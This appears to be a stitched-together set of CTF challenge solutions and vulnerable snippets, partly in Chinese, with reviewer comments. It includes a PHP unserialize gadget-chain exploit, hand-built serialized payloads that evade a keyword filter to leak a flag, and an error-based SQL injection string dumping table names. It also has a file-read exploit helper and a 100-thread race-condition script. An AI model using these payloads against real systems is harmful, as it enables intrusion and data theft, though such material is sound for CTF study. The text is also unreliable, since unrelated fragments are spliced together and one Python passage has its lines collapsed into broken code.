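# Submit the answer
def submit_answer(url, answer):
    """Submit a computed answer to the challenge page and print the outcome.

    Args:
        url: Base URL of the target; the request is sent to ``{url}/``.
        answer: Value to submit. ``None`` means "nothing to submit" and no
            request is made at all.

    On HTTP 200 prints "Answer submitted." followed by the response body,
    otherwise prints a failure line. The wire format is unchanged from the
    original (``answer`` interpolated raw into the query string, ``Submit``
    pre-encoded as 提交查询); the only functional change is a request timeout
    so an unresponsive target cannot hang the script forever. Connection
    errors and timeouts raised by ``requests`` propagate to the caller.
    """
    if answer is None:
        print("No answer to submit")
        return
    response = requests.get(
        f"{url}/?answer={answer}&Submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2",
        timeout=10,  # the original had no timeout: a stalled target blocked the solver
    )
    if response.status_code == 200:
        print("Answer submitted.")
        print(response.text)
    else:
        print("Failed to submit the answer")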
# Main entry point
def main():
    """Fetch the calculation problem from ``/calc``, solve it, submit the result.

    The target host is hard-coded. ``get_calculation_problem``,
    ``calculate_answer`` and ``submit_answer`` are defined elsewhere in the
    file; nothing is submitted when no problem could be retrieved.
    """
    base = "http://192.168.18.28"
    problem_url = base + "/calc"
    submit_url = base + "/"
    problem = get_calculation_problem(problem_url)
    if not problem:
        return
    submit_answer(submit_url, calculate_answer(problem))
# patch begin
class Remote:
    """A helper class to send the payload and download files.

    The logic of the exploit is always the same, but the exploit needs to know
    how to download files (/proc/self/maps and libc) and how to send the payload.

    The code here serves as an example that attacks a page that looks like:

    ```php
    <?php
    $data = file_get_contents($_POST['file']);
    echo "File contents: $data";
    ```

    Tweak it to fit your target, and start the exploit.

    NOTE(review): only ``send`` is listed here. ``self.session`` and ``self.url``
    are read but never assigned in this listing, so an ``__init__`` (and the
    download side mentioned above) must live in the part of the class not shown.
    """

    def send(self, path: str) -> Response:
        """Sends given `path` to the HTTP server. Returns the response."""
        # Wrap the path in the cls1/cls2 gadget chain, serialize it, and ship it
        # base64-encoded in the ``ser`` query parameter. ``serialize``, ``cls1``,
        # ``cls2`` and ``base64`` are not defined in this listing.
        # NOTE(review): if ``base64`` is the stdlib module, ``base64.encode`` is
        # the legacy two-file-object API and raises when given a string;
        # ``base64.b64encode(...)`` is the in-memory call. If ``base64`` here is a
        # helper exported by the exploit framework, disregard -- confirm.
        ser = base64.encode(serialize(cls1(cls2(path, ""), ["fileput"])))
        return self.session.get(self.url, params={"ser": ser})
或直接修改 `send`，手动拼接序列化字符串（见下）：
def send(self, path: str) -> Response:
    """Sends given `path` to the HTTP server. Returns the response.

    Variant of ``send`` that hand-builds the PHP-serialized cls1/cls2 gadget
    chain as a string instead of calling ``serialize()``; the ``s:N:"..."``
    length field for the filename is computed from ``path``.
    """
    # Length prefix for the filename string inside the serialized payload.
    # NOTE(review): len(path) counts characters while PHP's s:N: field is a byte
    # count, so a non-ASCII path would need len(path.encode()) -- confirm whether
    # that case can occur.
    patch_len = str(len(path))
    path = 'O:4:"cls1":2:{s:3:"cls";O:4:"cls2":2:{s:8:"filename";s:'+ patch_len +':"'+ path +'";s:3:"txt";s:0:"";}s:3:"arr";a:1:{i:0;s:7:"fileput";}}'
    # O:4:"cls1":2:{s:3:"cls";O:4:"cls2":2:{s:8:"filename";s:25:"data://text/plain;base64,";s:3:"txt";s:0:"";}s:3:"arr";a:1:{i:0;s:7:"fileput";}}
    # NOTE(review): with the stdlib ``base64`` module this call raises (it is the
    # two-file-object API); ``base64.b64encode(path.encode())`` is the in-memory
    # form. The listing also ends here without the request/return statement, so
    # the rest of the method is not shown.
    path = base64.encode(path)
spec = importlib.util.find_spec(module_name) if spec is None: return False
if module_name in sys.builtin_module_names: return True if spec.origin: std_lib_path = os.path.dirname(os.__file__) if spec.origin.startswith(std_lib_path) and not spec.origin.startswith(os.getcwd()): return True return False
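def verify_secure(m):
    """Reject a parsed module if it contains any import statement.

    Args:
        m: An AST node (normally the ``ast.Module`` produced by ``compile`` with
            ``PyCF_ONLY_AST``); the whole subtree is walked, so nested imports
            inside functions or classes are found too.

    Returns:
        False, after printing an ``ERROR: Banned module ...`` line naming the
        module(s), when an ``import`` or ``from ... import`` statement is found;
        True otherwise.

    NOTE(review): this blocks only import *statements*. ``__import__``,
    ``importlib`` reached through already-loaded objects, or attribute walks on
    builtins are not covered, so on its own this is not a sandbox boundary.
    """
    for node in ast.walk(m):
        if isinstance(node, ast.Import):
            # The original printed an empty module name for plain imports.
            names = ", ".join(alias.name for alias in node.names)
            print(f"ERROR: Banned module {names}")
            return False
        if isinstance(node, ast.ImportFrom):
            # node.module is None for a bare relative import (``from . import x``).
            print(f"ERROR: Banned module {node.module}")
            return False
    return True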
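def do(source_code):
    """Run untrusted ``source_code`` in a child interpreter behind an audit hook.

    Flow: echo the submission, statically reject any import statement via
    ``verify_secure`` (defined elsewhere in this file), write the audit-hook
    preamble plus the user code to ``run.py``, execute it with a 5 s budget and
    return its stdout.

    Returns:
        The child's stdout decoded as UTF-8; "Execution aborted due to security
        concerns." when the AST check fails; "Timeout!" when the 5 s budget is
        exceeded (the child is killed by ``subprocess.run``).

    Raises:
        SyntaxError: ``source_code`` does not parse (raised by ``compile``
            before anything is written to disk).
        OSError, UnicodeDecodeError: now propagate. The original's bare
            ``except`` reported every failure -- including a missing
            ``run.py`` -- as "Timeout!", hiding the real error.

    NOTE(review): the fixed ``run.py`` in the working directory means
    concurrent calls overwrite each other's code; a per-call temp file would
    be needed for that. The hook below is CTF-grade filtering, not a security
    boundary.
    """
    # Preamble executed in the child before the user's code. Kept byte-for-byte.
    # Note the ``len(event_name) > 4`` guard runs before the blacklist loop, so
    # every event name longer than four characters is rejected outright and only
    # the 4-character entries ("eval", "exec") of the blacklist can ever match.
    hook_code = '''
def my_audit_hook(event_name, arg):
    blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]
    if len(event_name) > 4:
        raise RuntimeError("Too Long!")
    for bad in blacklist:
        if bad in event_name:
            raise RuntimeError("No!")

__import__('sys').addaudithook(my_audit_hook)

'''
    print('do!')
    print('Source code: ', source_code)
    code = hook_code + source_code
    # Only the user's part is parsed for the import check; the preamble is trusted.
    tree = compile(source_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST)
    if not verify_secure(tree):
        return "Execution aborted due to security concerns."
    try:
        with open("run.py", 'w') as f:
            f.write(code)
        completed = subprocess.run(['python', 'run.py'], stdout=subprocess.PIPE, timeout=5)
        return completed.stdout.decode("utf-8")
    except subprocess.TimeoutExpired:
        return "Timeout!"
    finally:
        # Always clean up, but tolerate the file never having been created.
        try:
            os.remove('run.py')
        except FileNotFoundError:
            pass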
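def send_request():
    """Worker body: re-post ``data`` to ``url``/blockly_json until a hit.

    Loops forever. A response counts as a hit when it does not contain the
    expected "1 10" output, does not contain "No such file or direct", and is
    longer than 10 characters; the body is then printed and the whole process
    is terminated so the other worker threads stop as well.

    Reads the module-level ``url`` and ``data`` (defined elsewhere in the file).
    """
    while True:
        r = requests.post(
            url + "/blockly_json",
            headers={"Content-Type": "application/json"},
            data=json.dumps(data),
            timeout=10,  # a stalled connection must not park a worker forever
        )
        text = r.text
        if "1 10" in text or "No such file or direct" in text or len(text) <= 10:
            continue
        # flush=True: os._exit() skips interpreter shutdown, so buffered stdout
        # would otherwise be lost when output is piped to a file.
        print(text, flush=True)
        # The original called os.exit(), which does not exist: the AttributeError
        # killed only this thread and the other 99 kept running. os._exit() is
        # the call that ends the process from inside a worker thread.
        os._exit(-1)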
# Fan out a pool of identical workers racing the same request. No join: the
# main thread simply returns once every worker has been started.
num_threads = 100
threads = [threading.Thread(target=send_request) for _ in range(num_threads)]
for worker in threads:
    worker.start()
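/**
 * Full-text search over the book table.
 *
 * @param string $keyword  Search terms. Comes straight from the request, so it
 *                         is bound as a query parameter instead of being
 *                         spliced into the SQL text.
 * @param mixed  $num      Row limit. Cast to int so only a number can reach
 *                         the LIMIT clause.
 * @return mixed           Whatever Db::query() returns for the result set.
 *
 * The original concatenated "...against ('" . $keyword . "'..." and
 * "LIMIT " . $num, so a keyword could close the quote inside against('...')
 * and append arbitrary SQL. $this->prefix is assumed to be configuration,
 * not request input, and stays inline -- confirm.
 */
public function search($keyword, $num) {
    $sql = "select * from " . $this->prefix . "book"
        . " where delete_time=0"
        . " and match(book_name,summary,author_name,nick_name) against (? IN NATURAL LANGUAGE MODE)"
        . " LIMIT " . (int) $num;
    // Db::query()'s second argument is its bind list (ThinkPHP-style); confirm
    // against the framework version in use.
    return Db::query($sql, [$keyword]);
}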
`search()` 把 `keyword`（以及 `num`）直接拼接进 SQL，传入 keyword 即可闭合 `against('...')` 中的引号，构成 SQL 注入：
?keyword=0') or updatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables)),3) #
// Blacklist applied to the serialized payload before unserialize(): "admin"
// and "2024qwb" (case-insensitive) are rewritten to "nonono". The replacement
// has a different length, so any s:N:"..." length field covering a rewritten
// keyword no longer matches its content.
function filter($password){
    $filter_arr = array("admin","2024qwb");
    $filter = '/'.implode("|",$filter_arr).'/i';
    return preg_replace($filter,"nonono",$password);
}
class guest{
    public $username;
    public $value;
    // Runs when the object is used as a string (e.g. handed to strpos()).
    // Note: $value() calls an undefined local, not $this->value.
    public function __tostring(){
        if($this->username=="guest"){
            $value();
        }
        return $this->username;
    }
    // Runs on a call to an undefined method (e.g. ->guess() from user::__invoke).
    public function __call($key,$value){
        if($this->username==md5($GLOBALS["flag"])){
            echo $GLOBALS["flag"];
        }
    }
}
class root{
    public $username;
    public $value;
    // Runs on a read of an undefined property (e.g. $user->password below when
    // $user is a root). strpos(...) == 0 is a loose comparison: strpos() returns
    // false when "admin" is absent, and false == 0 is true in PHP.
    public function __get($key){
        if(strpos($this->username, "admin") == 0 && $this->value == "2024qwb"){
            $this->value = $GLOBALS["flag"]; // the flag is written into $this->value
            echo md5("hello:".$this->value);
        }
    }
}
class user{
    public $username;
    public $password;
    public $value;
    // Runs when the object is called like a function.
    public function __invoke(){
        $this->username=md5($GLOBALS["flag"]);
        return $this->password->guess();
    }
    // Runs on destruction; same loose strpos() == 0 comparison as root::__get.
    public function __destruct(){
        if(strpos($this->username, "admin") == 0 ){
            echo "hello".$this->username;
        }
    }
}
// Request input reaches unserialize() directly. The only defense is filter(),
// which rewrites the serialized text; it says nothing about values that only
// come into existence at runtime (e.g. via references or magic methods).
$user=unserialize(filter($_POST["password"]));
if(strpos($user->username, "admin") == 0 && $user->password == "2024qwb"){
    echo "hello!";
}
法一
<?php
// Exploit-side stand-ins for the target's classes: serialize() only needs the
// public properties; the magic methods run on the server.
class root{
    public $username;
    // An int (2024) rather than the literal "2024qwb", which filter() would
    // rewrite. The server's check $this->value == "2024qwb" then relies on
    // loose int-vs-string comparison: true under PHP 7 semantics (leading
    // numeric prefix), false under PHP 8, so this payload assumes a PHP 7
    // target -- confirm.
    public $value=2024;
    // Extra property that does not exist on the server's root class; it just
    // carries the user object so it gets unserialized and later destructed.
    public $gxngxngxn;
}
class user{
    public $username;
    public $password;
}
// Build root -> user, then alias user::$username to root::$value so that
// whatever root::__get writes into $value is what user::__destruct echoes.
// serialize() emits the alias as an R: back-reference, which survives filter().
$payload = new root();
$carrier = new user();
$carrier->username = &$payload->value;
$payload->gxngxngxn = $carrier;
echo serialize($payload);
法二
直接构造对象链，再手动修改序列化结果（以绕过 filter 对关键字的替换）：
// Method 2 chain (this listing stops before the serialize()/echo step):
//   root::$username -> guest("admin"): strpos() stringifies it via guest::__tostring
//   root::$value    -> &user::$username ("2024qwb"): __get's write lands in the user,
//                      whose __destruct then echoes it
$obj = new root();
$g1 = new guest();
$g1->username = "admin";
$obj->username = $g1;
$u1 = new user();
$u1->username = "2024qwb";
$g1->value = $u1;
$obj->value = &$u1->username;
// NOTE(review): both literals above are exactly the keywords filter() rewrites,
// so the serialized string has to be edited by hand before it is submitted;
// the remaining lines of this listing are not shown.